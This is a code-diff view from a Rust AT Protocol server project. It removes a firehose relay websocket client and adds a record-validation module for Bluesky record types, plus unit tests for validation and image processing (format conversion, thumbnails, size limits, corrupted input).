··· 1 - use crate::state::AppState; 2 - use crate::sync::util::format_event_for_sending; 3 - use futures::{sink::SinkExt, stream::StreamExt}; 4 - use std::time::Duration; 5 - use tokio::sync::mpsc; 6 - use tokio_tungstenite::{connect_async, tungstenite::Message}; 7 - use tracing::{error, info, warn}; 8 - 9 - async fn run_relay_client(state: AppState, url: String, ready_tx: Option<mpsc::Sender<()>>) { 10 - info!("Starting firehose client for relay: {}", url); 11 - loop { 12 - match connect_async(&url).await { 13 - Ok((mut ws_stream, _)) => { 14 - info!("Connected to firehose relay: {}", url); 15 - let mut rx = state.firehose_tx.subscribe(); 16 - if let Some(tx) = ready_tx.as_ref() { 17 - tx.send(()).await.ok(); 18 - } 19 - 20 - loop { 21 - tokio::select! { 22 - Ok(event) = rx.recv() => { 23 - match format_event_for_sending(&state, event).await { 24 - Ok(bytes) => { 25 - if let Err(e) = ws_stream.send(Message::Binary(bytes.into())).await { 26 - warn!("Failed to send event to {}: {}. Disconnecting.", url, e); 27 - break; 28 - } 29 - } 30 - Err(e) => { 31 - error!("Failed to format event for relay {}: {}", url, e); 32 - } 33 - } 34 - } 35 - Some(msg) = ws_stream.next() => { 36 - if let Ok(Message::Close(_)) = msg { 37 - warn!("Relay {} closed connection.", url); 38 - break; 39 - } 40 - } 41 - else => break, 42 - } 43 - } 44 - } 45 - Err(e) => { 46 - error!("Failed to connect to firehose relay {}: {}", url, e); 47 - } 48 - } 49 - warn!( 50 - "Disconnected from {}. Reconnecting in 5 seconds...", 51 - url 52 - ); 53 - tokio::time::sleep(Duration::from_secs(5)).await; 54 - } 55 - } 56 - 57 - pub async fn start_relay_clients( 58 - state: AppState, 59 - relays: Vec<String>, 60 - mut ready_rx: Option<mpsc::Receiver<()>>, 61 - ) { 62 - if relays.is_empty() { 63 - return; 64 - } 65 - 66 - let (ready_tx, mut internal_ready_rx) = mpsc::channel(1); 67 - 68 - for url in relays { 69 - let ready_tx = if ready_rx.is_some() { 70 - Some(ready_tx.clone()) 71 - } else { 72 - None 73 - }; 74 - tokio::spawn(run_relay_client(state.clone(), url, ready_tx)); 75 - } 76 - 77 - if let Some(mut rx) = ready_rx.take() { 78 - tokio::spawn(async move { 79 - internal_ready_rx.recv().await; 80 - rx.close(); 81 - }); 82 - } 83 - }
···
+504
src/validation/mod.rs
···
··· 1 + use serde_json::Value; 2 + use thiserror::Error; 3 + 4 + #[derive(Debug, Error)] 5 + pub enum ValidationError { 6 + #[error("No $type provided")] 7 + MissingType, 8 + 9 + #[error("Invalid $type: expected {expected}, got {actual}")] 10 + TypeMismatch { expected: String, actual: String }, 11 + 12 + #[error("Missing required field: {0}")] 13 + MissingField(String), 14 + 15 + #[error("Invalid field value at {path}: {message}")] 16 + InvalidField { path: String, message: String }, 17 + 18 + #[error("Invalid datetime format at {path}: must be RFC-3339/ISO-8601")] 19 + InvalidDatetime { path: String }, 20 + 21 + #[error("Invalid record: {0}")] 22 + InvalidRecord(String), 23 + 24 + #[error("Unknown record type: {0}")] 25 + UnknownType(String), 26 + } 27 + 28 + #[derive(Debug, Clone, Copy, PartialEq, Eq)] 29 + pub enum ValidationStatus { 30 + Valid, 31 + Unknown, 32 + Invalid, 33 + } 34 + 35 + pub struct RecordValidator { 36 + require_lexicon: bool, 37 + } 38 + 39 + impl Default for RecordValidator { 40 + fn default() -> Self { 41 + Self::new() 42 + } 43 + } 44 + 45 + impl RecordValidator { 46 + pub fn new() -> Self { 47 + Self { 48 + require_lexicon: false, 49 + } 50 + } 51 + 52 + pub fn require_lexicon(mut self, require: bool) -> Self { 53 + self.require_lexicon = require; 54 + self 55 + } 56 + 57 + pub fn validate( 58 + &self, 59 + record: &Value, 60 + collection: &str, 61 + ) -> Result<ValidationStatus, ValidationError> { 62 + let obj = record 63 + .as_object() 64 + .ok_or_else(|| ValidationError::InvalidRecord("Record must be an object".to_string()))?; 65 + 66 + let record_type = obj 67 + .get("$type") 68 + .and_then(|v| v.as_str()) 69 + .ok_or(ValidationError::MissingType)?; 70 + 71 + if record_type != collection { 72 + return Err(ValidationError::TypeMismatch { 73 + expected: collection.to_string(), 74 + actual: record_type.to_string(), 75 + }); 76 + } 77 + 78 + if let Some(created_at) = obj.get("createdAt").and_then(|v| v.as_str()) { 79 + validate_datetime(created_at, "createdAt")?; 80 + } 81 + 82 + match record_type { 83 + "app.bsky.feed.post" => self.validate_post(obj)?, 84 + "app.bsky.actor.profile" => self.validate_profile(obj)?, 85 + "app.bsky.feed.like" => self.validate_like(obj)?, 86 + "app.bsky.feed.repost" => self.validate_repost(obj)?, 87 + "app.bsky.graph.follow" => self.validate_follow(obj)?, 88 + "app.bsky.graph.block" => self.validate_block(obj)?, 89 + "app.bsky.graph.list" => self.validate_list(obj)?, 90 + "app.bsky.graph.listitem" => self.validate_list_item(obj)?, 91 + "app.bsky.feed.generator" => self.validate_feed_generator(obj)?, 92 + "app.bsky.feed.threadgate" => self.validate_threadgate(obj)?, 93 + "app.bsky.labeler.service" => self.validate_labeler_service(obj)?, 94 + _ => { 95 + if self.require_lexicon { 96 + return Err(ValidationError::UnknownType(record_type.to_string())); 97 + } 98 + return Ok(ValidationStatus::Unknown); 99 + } 100 + } 101 + 102 + Ok(ValidationStatus::Valid) 103 + } 104 + 105 + fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 106 + if !obj.contains_key("text") { 107 + return Err(ValidationError::MissingField("text".to_string())); 108 + } 109 + 110 + if !obj.contains_key("createdAt") { 111 + return Err(ValidationError::MissingField("createdAt".to_string())); 112 + } 113 + 114 + if let Some(text) = obj.get("text").and_then(|v| v.as_str()) { 115 + let grapheme_count = text.chars().count(); 116 + if grapheme_count > 3000 { 117 + return Err(ValidationError::InvalidField { 118 + path: "text".to_string(), 119 + message: format!("Text exceeds maximum length of 3000 characters (got {})", grapheme_count), 120 + }); 121 + } 122 + } 123 + 124 + if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) { 125 + if langs.len() > 3 { 126 + return Err(ValidationError::InvalidField { 127 + path: "langs".to_string(), 128 + message: "Maximum 3 languages allowed".to_string(), 129 + }); 130 + } 131 + } 132 + 133 + if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) { 134 + if tags.len() > 8 { 135 + return Err(ValidationError::InvalidField { 136 + path: "tags".to_string(), 137 + message: "Maximum 8 tags allowed".to_string(), 138 + }); 139 + } 140 + for (i, tag) in tags.iter().enumerate() { 141 + if let Some(tag_str) = tag.as_str() { 142 + if tag_str.len() > 640 { 143 + return Err(ValidationError::InvalidField { 144 + path: format!("tags/{}", i), 145 + message: "Tag exceeds maximum length of 640 bytes".to_string(), 146 + }); 147 + } 148 + } 149 + } 150 + } 151 + 152 + Ok(()) 153 + } 154 + 155 + fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 156 + if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) { 157 + let grapheme_count = display_name.chars().count(); 158 + if grapheme_count > 640 { 159 + return Err(ValidationError::InvalidField { 160 + path: "displayName".to_string(), 161 + message: format!("Display name exceeds maximum length of 640 characters (got {})", grapheme_count), 162 + }); 163 + } 164 + } 165 + 166 + if let Some(description) = obj.get("description").and_then(|v| v.as_str()) { 167 + let grapheme_count = description.chars().count(); 168 + if grapheme_count > 2560 { 169 + return Err(ValidationError::InvalidField { 170 + path: "description".to_string(), 171 + message: format!("Description exceeds maximum length of 2560 characters (got {})", grapheme_count), 172 + }); 173 + } 174 + } 175 + 176 + Ok(()) 177 + } 178 + 179 + fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 180 + if !obj.contains_key("subject") { 181 + return Err(ValidationError::MissingField("subject".to_string())); 182 + } 183 + if !obj.contains_key("createdAt") { 184 + return Err(ValidationError::MissingField("createdAt".to_string())); 185 + } 186 + self.validate_strong_ref(obj.get("subject"), "subject")?; 187 + Ok(()) 188 + } 189 + 190 + fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 191 + if !obj.contains_key("subject") { 192 + return Err(ValidationError::MissingField("subject".to_string())); 193 + } 194 + if !obj.contains_key("createdAt") { 195 + return Err(ValidationError::MissingField("createdAt".to_string())); 196 + } 197 + self.validate_strong_ref(obj.get("subject"), "subject")?; 198 + Ok(()) 199 + } 200 + 201 + fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 202 + if !obj.contains_key("subject") { 203 + return Err(ValidationError::MissingField("subject".to_string())); 204 + } 205 + if !obj.contains_key("createdAt") { 206 + return Err(ValidationError::MissingField("createdAt".to_string())); 207 + } 208 + 209 + if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) { 210 + if !subject.starts_with("did:") { 211 + return Err(ValidationError::InvalidField { 212 + path: "subject".to_string(), 213 + message: "Subject must be a DID".to_string(), 214 + }); 215 + } 216 + } 217 + 218 + Ok(()) 219 + } 220 + 221 + fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 222 + if !obj.contains_key("subject") { 223 + return Err(ValidationError::MissingField("subject".to_string())); 224 + } 225 + if !obj.contains_key("createdAt") { 226 + return Err(ValidationError::MissingField("createdAt".to_string())); 227 + } 228 + 229 + if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) { 230 + if !subject.starts_with("did:") { 231 + return Err(ValidationError::InvalidField { 232 + path: "subject".to_string(), 233 + message: "Subject must be a DID".to_string(), 234 + }); 235 + } 236 + } 237 + 238 + Ok(()) 239 + } 240 + 241 + fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 242 + if !obj.contains_key("name") { 243 + return Err(ValidationError::MissingField("name".to_string())); 244 + } 245 + if !obj.contains_key("purpose") { 246 + return Err(ValidationError::MissingField("purpose".to_string())); 247 + } 248 + if !obj.contains_key("createdAt") { 249 + return Err(ValidationError::MissingField("createdAt".to_string())); 250 + } 251 + 252 + if let Some(name) = obj.get("name").and_then(|v| v.as_str()) { 253 + if name.is_empty() || name.len() > 64 { 254 + return Err(ValidationError::InvalidField { 255 + path: "name".to_string(), 256 + message: "Name must be 1-64 characters".to_string(), 257 + }); 258 + } 259 + } 260 + 261 + Ok(()) 262 + } 263 + 264 + fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 265 + if !obj.contains_key("subject") { 266 + return Err(ValidationError::MissingField("subject".to_string())); 267 + } 268 + if !obj.contains_key("list") { 269 + return Err(ValidationError::MissingField("list".to_string())); 270 + } 271 + if !obj.contains_key("createdAt") { 272 + return Err(ValidationError::MissingField("createdAt".to_string())); 273 + } 274 + Ok(()) 275 + } 276 + 277 + fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 278 + if !obj.contains_key("did") { 279 + return Err(ValidationError::MissingField("did".to_string())); 280 + } 281 + if !obj.contains_key("displayName") { 282 + return Err(ValidationError::MissingField("displayName".to_string())); 283 + } 284 + if !obj.contains_key("createdAt") { 285 + return Err(ValidationError::MissingField("createdAt".to_string())); 286 + } 287 + 288 + if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) { 289 + if display_name.is_empty() || display_name.len() > 240 { 290 + return Err(ValidationError::InvalidField { 291 + path: "displayName".to_string(), 292 + message: "displayName must be 1-240 characters".to_string(), 293 + }); 294 + } 295 + } 296 + 297 + Ok(()) 298 + } 299 + 300 + fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 301 + if !obj.contains_key("post") { 302 + return Err(ValidationError::MissingField("post".to_string())); 303 + } 304 + if !obj.contains_key("createdAt") { 305 + return Err(ValidationError::MissingField("createdAt".to_string())); 306 + } 307 + Ok(()) 308 + } 309 + 310 + fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 311 + if !obj.contains_key("policies") { 312 + return Err(ValidationError::MissingField("policies".to_string())); 313 + } 314 + if !obj.contains_key("createdAt") { 315 + return Err(ValidationError::MissingField("createdAt".to_string())); 316 + } 317 + Ok(()) 318 + } 319 + 320 + fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> { 321 + let obj = value 322 + .and_then(|v| v.as_object()) 323 + .ok_or_else(|| ValidationError::InvalidField { 324 + path: path.to_string(), 325 + message: "Must be a strong reference object".to_string(), 326 + })?; 327 + 328 + if !obj.contains_key("uri") { 329 + return Err(ValidationError::MissingField(format!("{}/uri", path))); 330 + } 331 + if !obj.contains_key("cid") { 332 + return Err(ValidationError::MissingField(format!("{}/cid", path))); 333 + } 334 + 335 + if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) { 336 + if !uri.starts_with("at://") { 337 + return Err(ValidationError::InvalidField { 338 + path: format!("{}/uri", path), 339 + message: "URI must be an at:// URI".to_string(), 340 + }); 341 + } 342 + } 343 + 344 + Ok(()) 345 + } 346 + } 347 + 348 + fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> { 349 + if chrono::DateTime::parse_from_rfc3339(value).is_err() { 350 + return Err(ValidationError::InvalidDatetime { 351 + path: path.to_string(), 352 + }); 353 + } 354 + Ok(()) 355 + } 356 + 357 + pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> { 358 + if rkey.is_empty() { 359 + return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string())); 360 + } 361 + 362 + if rkey.len() > 512 { 363 + return Err(ValidationError::InvalidRecord("Record key exceeds maximum length of 512".to_string())); 364 + } 365 + 366 + if rkey == "." || rkey == ".." { 367 + return Err(ValidationError::InvalidRecord("Record key cannot be '.' or '..'".to_string())); 368 + } 369 + 370 + let valid_chars = rkey.chars().all(|c| { 371 + c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_' || c == '~' 372 + }); 373 + 374 + if !valid_chars { 375 + return Err(ValidationError::InvalidRecord( 376 + "Record key contains invalid characters (must be alphanumeric, '.', '-', '_', or '~')".to_string() 377 + )); 378 + } 379 + 380 + Ok(()) 381 + } 382 + 383 + pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> { 384 + if collection.is_empty() { 385 + return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string())); 386 + } 387 + 388 + let parts: Vec<&str> = collection.split('.').collect(); 389 + if parts.len() < 3 { 390 + return Err(ValidationError::InvalidRecord( 391 + "Collection NSID must have at least 3 segments".to_string() 392 + )); 393 + } 394 + 395 + for part in &parts { 396 + if part.is_empty() { 397 + return Err(ValidationError::InvalidRecord( 398 + "Collection NSID segments cannot be empty".to_string() 399 + )); 400 + } 401 + if !part.chars().all(|c| c.is_ascii_alphanumeric() || c == '-') { 402 + return Err(ValidationError::InvalidRecord( 403 + "Collection NSID segments must be alphanumeric or hyphens".to_string() 404 + )); 405 + } 406 + } 407 + 408 + Ok(()) 409 + } 410 + 411 + #[cfg(test)] 412 + mod tests { 413 + use super::*; 414 + use serde_json::json; 415 + 416 + #[test] 417 + fn test_validate_post() { 418 + let validator = RecordValidator::new(); 419 + 420 + let valid_post = json!({ 421 + "$type": "app.bsky.feed.post", 422 + "text": "Hello, world!", 423 + "createdAt": "2024-01-01T00:00:00.000Z" 424 + }); 425 + 426 + assert_eq!( 427 + validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), 428 + ValidationStatus::Valid 429 + ); 430 + } 431 + 432 + #[test] 433 + fn test_validate_post_missing_text() { 434 + let validator = RecordValidator::new(); 435 + 436 + let invalid_post = json!({ 437 + "$type": "app.bsky.feed.post", 438 + "createdAt": "2024-01-01T00:00:00.000Z" 439 + }); 440 + 441 + assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err()); 442 + } 443 + 444 + #[test] 445 + fn test_validate_type_mismatch() { 446 + let validator = RecordValidator::new(); 447 + 448 + let record = json!({ 449 + "$type": "app.bsky.feed.like", 450 + "subject": {"uri": "at://did:plc:test/app.bsky.feed.post/123", "cid": "bafyrei..."}, 451 + "createdAt": "2024-01-01T00:00:00.000Z" 452 + }); 453 + 454 + let result = validator.validate(&record, "app.bsky.feed.post"); 455 + assert!(matches!(result, Err(ValidationError::TypeMismatch { .. }))); 456 + } 457 + 458 + #[test] 459 + fn test_validate_unknown_type() { 460 + let validator = RecordValidator::new(); 461 + 462 + let record = json!({ 463 + "$type": "com.example.custom", 464 + "data": "test" 465 + }); 466 + 467 + assert_eq!( 468 + validator.validate(&record, "com.example.custom").unwrap(), 469 + ValidationStatus::Unknown 470 + ); 471 + } 472 + 473 + #[test] 474 + fn test_validate_unknown_type_strict() { 475 + let validator = RecordValidator::new().require_lexicon(true); 476 + 477 + let record = json!({ 478 + "$type": "com.example.custom", 479 + "data": "test" 480 + }); 481 + 482 + let result = validator.validate(&record, "com.example.custom"); 483 + assert!(matches!(result, Err(ValidationError::UnknownType(_)))); 484 + } 485 + 486 + #[test] 487 + fn test_validate_record_key() { 488 + assert!(validate_record_key("valid-key_123").is_ok()); 489 + assert!(validate_record_key("3k2n5j2").is_ok()); 490 + assert!(validate_record_key(".").is_err()); 491 + assert!(validate_record_key("..").is_err()); 492 + assert!(validate_record_key("").is_err()); 493 + assert!(validate_record_key("invalid/key").is_err()); 494 + } 495 + 496 + #[test] 497 + fn test_validate_collection_nsid() { 498 + assert!(validate_collection_nsid("app.bsky.feed.post").is_ok()); 499 + assert!(validate_collection_nsid("com.atproto.repo.record").is_ok()); 500 + assert!(validate_collection_nsid("invalid").is_err()); 501 + assert!(validate_collection_nsid("a.b").is_err()); 502 + assert!(validate_collection_nsid("").is_err()); 503 + } 504 + }
+315
tests/image_processing.rs
···
··· 1 + use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE}; 2 + use image::{DynamicImage, ImageFormat}; 3 + use std::io::Cursor; 4 + 5 + fn create_test_png(width: u32, height: u32) -> Vec<u8> { 6 + let img = DynamicImage::new_rgb8(width, height); 7 + let mut buf = Vec::new(); 8 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 9 + buf 10 + } 11 + 12 + fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 13 + let img = DynamicImage::new_rgb8(width, height); 14 + let mut buf = Vec::new(); 15 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap(); 16 + buf 17 + } 18 + 19 + fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 20 + let img = DynamicImage::new_rgb8(width, height); 21 + let mut buf = Vec::new(); 22 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap(); 23 + buf 24 + } 25 + 26 + fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 27 + let img = DynamicImage::new_rgb8(width, height); 28 + let mut buf = Vec::new(); 29 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap(); 30 + buf 31 + } 32 + 33 + #[test] 34 + fn test_process_png() { 35 + let processor = ImageProcessor::new(); 36 + let data = create_test_png(500, 500); 37 + let result = processor.process(&data, "image/png").unwrap(); 38 + assert_eq!(result.original.width, 500); 39 + assert_eq!(result.original.height, 500); 40 + } 41 + 42 + #[test] 43 + fn test_process_jpeg() { 44 + let processor = ImageProcessor::new(); 45 + let data = create_test_jpeg(400, 300); 46 + let result = processor.process(&data, "image/jpeg").unwrap(); 47 + assert_eq!(result.original.width, 400); 48 + assert_eq!(result.original.height, 300); 49 + } 50 + 51 + #[test] 52 + fn test_process_gif() { 53 + let processor = ImageProcessor::new(); 54 + let data = create_test_gif(200, 200); 55 + let result = processor.process(&data, "image/gif").unwrap(); 56 + assert_eq!(result.original.width, 200); 57 + assert_eq!(result.original.height, 200); 58 + } 59 + 60 + #[test] 61 + fn test_process_webp() { 62 + let processor = ImageProcessor::new(); 63 + let data = create_test_webp(300, 200); 64 + let result = processor.process(&data, "image/webp").unwrap(); 65 + assert_eq!(result.original.width, 300); 66 + assert_eq!(result.original.height, 200); 67 + } 68 + 69 + #[test] 70 + fn test_thumbnail_feed_size() { 71 + let processor = ImageProcessor::new(); 72 + let data = create_test_png(800, 600); 73 + let result = processor.process(&data, "image/png").unwrap(); 74 + 75 + let thumb = result.thumbnail_feed.expect("Should generate feed thumbnail for large image"); 76 + assert!(thumb.width <= THUMB_SIZE_FEED); 77 + assert!(thumb.height <= THUMB_SIZE_FEED); 78 + } 79 + 80 + #[test] 81 + fn test_thumbnail_full_size() { 82 + let processor = ImageProcessor::new(); 83 + let data = create_test_png(2000, 1500); 84 + let result = processor.process(&data, "image/png").unwrap(); 85 + 86 + let thumb = result.thumbnail_full.expect("Should generate full thumbnail for large image"); 87 + assert!(thumb.width <= THUMB_SIZE_FULL); 88 + assert!(thumb.height <= THUMB_SIZE_FULL); 89 + } 90 + 91 + #[test] 92 + fn test_no_thumbnail_small_image() { 93 + let processor = ImageProcessor::new(); 94 + let data = create_test_png(100, 100); 95 + let result = processor.process(&data, "image/png").unwrap(); 96 + 97 + assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail"); 98 + assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail"); 99 + } 100 + 101 + #[test] 102 + fn test_webp_conversion() { 103 + let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP); 104 + let data = create_test_png(300, 300); 105 + let result = processor.process(&data, "image/png").unwrap(); 106 + 107 + assert_eq!(result.original.mime_type, "image/webp"); 108 + } 109 + 110 + #[test] 111 + fn test_jpeg_output_format() { 112 + let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg); 113 + let data = create_test_png(300, 300); 114 + let result = processor.process(&data, "image/png").unwrap(); 115 + 116 + assert_eq!(result.original.mime_type, "image/jpeg"); 117 + } 118 + 119 + #[test] 120 + fn test_png_output_format() { 121 + let processor = ImageProcessor::new().with_output_format(OutputFormat::Png); 122 + let data = create_test_jpeg(300, 300); 123 + let result = processor.process(&data, "image/jpeg").unwrap(); 124 + 125 + assert_eq!(result.original.mime_type, "image/png"); 126 + } 127 + 128 + #[test] 129 + fn test_max_dimension_enforced() { 130 + let processor = ImageProcessor::new().with_max_dimension(1000); 131 + let data = create_test_png(2000, 2000); 132 + let result = processor.process(&data, "image/png"); 133 + 134 + assert!(matches!(result, Err(ImageError::TooLarge { .. }))); 135 + if let Err(ImageError::TooLarge { width, height, max_dimension }) = result { 136 + assert_eq!(width, 2000); 137 + assert_eq!(height, 2000); 138 + assert_eq!(max_dimension, 1000); 139 + } 140 + } 141 + 142 + #[test] 143 + fn test_file_size_limit() { 144 + let processor = ImageProcessor::new().with_max_file_size(100); 145 + let data = create_test_png(500, 500); 146 + let result = processor.process(&data, "image/png"); 147 + 148 + assert!(matches!(result, Err(ImageError::FileTooLarge { .. }))); 149 + if let Err(ImageError::FileTooLarge { size, max_size }) = result { 150 + assert!(size > 100); 151 + assert_eq!(max_size, 100); 152 + } 153 + } 154 + 155 + #[test] 156 + fn test_default_max_file_size() { 157 + assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024); 158 + } 159 + 160 + #[test] 161 + fn test_unsupported_format_rejected() { 162 + let processor = ImageProcessor::new(); 163 + let data = b"this is not an image"; 164 + let result = processor.process(data, "application/octet-stream"); 165 + 166 + assert!(matches!(result, Err(ImageError::UnsupportedFormat(_)))); 167 + } 168 + 169 + #[test] 170 + fn test_corrupted_image_handling() { 171 + let processor = ImageProcessor::new(); 172 + let data = b"\x89PNG\r\n\x1a\ncorrupted data here"; 173 + let result = processor.process(data, "image/png"); 174 + 175 + assert!(matches!(result, Err(ImageError::DecodeError(_)))); 176 + } 177 + 178 + #[test] 179 + fn test_aspect_ratio_preserved_landscape() { 180 + let processor = ImageProcessor::new(); 181 + let data = create_test_png(1600, 800); 182 + let result = processor.process(&data, "image/png").unwrap(); 183 + 184 + let thumb = result.thumbnail_full.expect("Should have thumbnail"); 185 + let original_ratio = 1600.0 / 800.0; 186 + let thumb_ratio = thumb.width as f64 / thumb.height as f64; 187 + assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 188 + } 189 + 190 + #[test] 191 + fn test_aspect_ratio_preserved_portrait() { 192 + let processor = ImageProcessor::new(); 193 + let data = create_test_png(800, 1600); 194 + let result = processor.process(&data, "image/png").unwrap(); 195 + 196 + let thumb = result.thumbnail_full.expect("Should have thumbnail"); 197 + let original_ratio = 800.0 / 1600.0; 198 + let thumb_ratio = thumb.width as f64 / thumb.height as f64; 199 + assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 200 + } 201 + 202 + #[test] 203 + fn test_mime_type_detection_auto() { 204 + let processor = ImageProcessor::new(); 205 + let data = create_test_png(100, 100); 206 + let result = processor.process(&data, "application/octet-stream"); 207 + 208 + assert!(result.is_ok(), "Should detect PNG format from data"); 209 + } 210 + 211 + #[test] 212 + fn test_is_supported_mime_type() { 213 + assert!(ImageProcessor::is_supported_mime_type("image/jpeg")); 214 + assert!(ImageProcessor::is_supported_mime_type("image/jpg")); 215 + assert!(ImageProcessor::is_supported_mime_type("image/png")); 216 + assert!(ImageProcessor::is_supported_mime_type("image/gif")); 217 + assert!(ImageProcessor::is_supported_mime_type("image/webp")); 218 + assert!(ImageProcessor::is_supported_mime_type("IMAGE/PNG")); 219 + assert!(ImageProcessor::is_supported_mime_type("Image/Jpeg")); 220 + 221 + assert!(!ImageProcessor::is_supported_mime_type("image/bmp")); 222 + assert!(!ImageProcessor::is_supported_mime_type("image/tiff")); 223 + assert!(!ImageProcessor::is_supported_mime_type("text/plain")); 224 + assert!(!ImageProcessor::is_supported_mime_type("application/json")); 225 + } 226 + 227 + #[test] 228 + fn test_strip_exif() { 229 + let data = create_test_jpeg(100, 100); 230 + let result = ImageProcessor::strip_exif(&data); 231 + assert!(result.is_ok()); 232 + let stripped = result.unwrap(); 233 + assert!(!stripped.is_empty()); 234 + } 235 + 236 + #[test] 237 + fn test_with_thumbnails_disabled() { 238 + let processor = ImageProcessor::new().with_thumbnails(false); 239 + let data = create_test_png(2000, 2000); 240 + let result = processor.process(&data, "image/png").unwrap(); 241 + 242 + assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled"); 243 + assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled"); 244 + } 245 + 246 + #[test] 247 + fn test_builder_chaining() { 248 + let processor = ImageProcessor::new() 249 + .with_max_dimension(2048) 250 + .with_max_file_size(5 * 1024 * 1024) 251 + .with_output_format(OutputFormat::Jpeg) 252 + .with_thumbnails(true); 253 + 254 + let data = create_test_png(500, 500); 255 + let result = processor.process(&data, "image/png").unwrap(); 256 + assert_eq!(result.original.mime_type, "image/jpeg"); 257 + } 258 + 259 + #[test] 260 + fn test_processed_image_fields() { 261 + let processor = ImageProcessor::new(); 262 + let data = create_test_png(500, 500); 263 + let result = processor.process(&data, "image/png").unwrap(); 264 + 265 + assert!(!result.original.data.is_empty()); 266 + assert!(!result.original.mime_type.is_empty()); 267 + assert!(result.original.width > 0); 268 + assert!(result.original.height > 0); 269 + } 270 + 271 + #[test] 272 + fn test_only_feed_thumbnail_for_medium_images() { 273 + let processor = ImageProcessor::new(); 274 + let data = create_test_png(500, 500); 275 + let result = processor.process(&data, "image/png").unwrap(); 276 + 277 + assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 278 + assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image"); 279 + } 280 + 281 + #[test] 282 + fn test_both_thumbnails_for_large_images() { 283 + let processor = ImageProcessor::new(); 284 + let data = create_test_png(2000, 2000); 285 + let result = processor.process(&data, "image/png").unwrap(); 286 + 287 + assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 288 + assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image"); 289 + } 290 + 291 + #[test] 292 + fn test_exact_threshold_boundary_feed() { 293 + let processor = ImageProcessor::new(); 294 + 295 + let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED); 296 + let result = processor.process(&at_threshold, "image/png").unwrap(); 297 + assert!(result.thumbnail_feed.is_none(), "Exact threshold should not generate thumbnail"); 298 + 299 + let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1); 300 + let result = processor.process(&above_threshold, "image/png").unwrap(); 301 + assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail"); 302 + } 303 + 304 + #[test] 305 + fn test_exact_threshold_boundary_full() { 306 + let processor = ImageProcessor::new(); 307 + 308 + let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL); 309 + let result = processor.process(&at_threshold, "image/png").unwrap(); 310 + assert!(result.thumbnail_full.is_none(), "Exact threshold should not generate thumbnail"); 311 + 312 + let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1); 313 + let result = processor.process(&above_threshold, "image/png").unwrap(); 314 + assert!(result.thumbnail_full.is_some(), "Above threshold should generate thumbnail"); 315 + }
+5
tests/import_with_verification.rs
